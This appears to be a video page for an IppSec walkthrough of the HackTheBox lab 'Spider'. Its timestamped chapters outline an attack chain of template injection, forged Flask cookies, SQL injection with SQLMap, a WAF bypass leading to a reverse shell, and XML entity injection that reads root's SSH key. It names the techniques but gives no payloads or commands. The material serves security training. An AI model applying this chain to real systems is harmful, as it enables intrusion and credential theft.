HackTheBox - Spider

Published: 23 October 2021
on channel: IppSec

43,471

929

00:00 - Intro
01:10 - Start of nmap
02:40 - Adding spider.htb to our host file so we can access the domain name
03:30 - Playing with the registration of the website and examining the cookie
06:20 - Putting a bunch of bad characters for our username and discovering odd behaviors
10:05 - Dumping the configuration via SSTI, can't do a complex SSTI due to username limit
12:30 - We have the cookie secret, using Flask-Unsign to create malicious cookies and discover SQL Injection
16:25 - Sending our SQL Injection Payload to the server and confirming it is SQL Injectable
18:05 - Using the Eval Parameter of SQLMap to have SQLMap Sign the payloads it sends and dump the database
22:45 - Getting Chiv's password from SQLMap then logging into the web application
24:30 - Testing SSTI on the admin panel that we got to from Chiv and discovering a WAF (Web Application Firewall)
26:40 - Using wfuzz to enumerate the bad characters which trigger the WAF
29:00 - Playing with wfuzz encoders to URLEncode everything from our wordlist
33:50 - Obfuscating our SSTI Payload so the bad characters are not present and getting a reverse shell
37:10 - Reverse shell returned
41:10 - Using SSH to setup a port forward which allows us to hit 127.0.0.1:8080 on the remote host
43:00 - Examining the authentication cookie and discovering a XML within the cookie
44:00 - Testing for XML Entity Injection
45:50 - Using Payload All The Things to help us craft an XML Entity Injection payload to read files
48:30 - Grabbing the SSH Private Key via XML Entity Injection and logging in as root

Watch video HackTheBox - Spider online, duration hours minute second in high quality that is uploaded to the channel IppSec 23 October 2021. Share the link to the video on social media so that your subscribers and friends will also watch this video. This video clip has been viewed 43,471 times and liked it 929 visitors.

443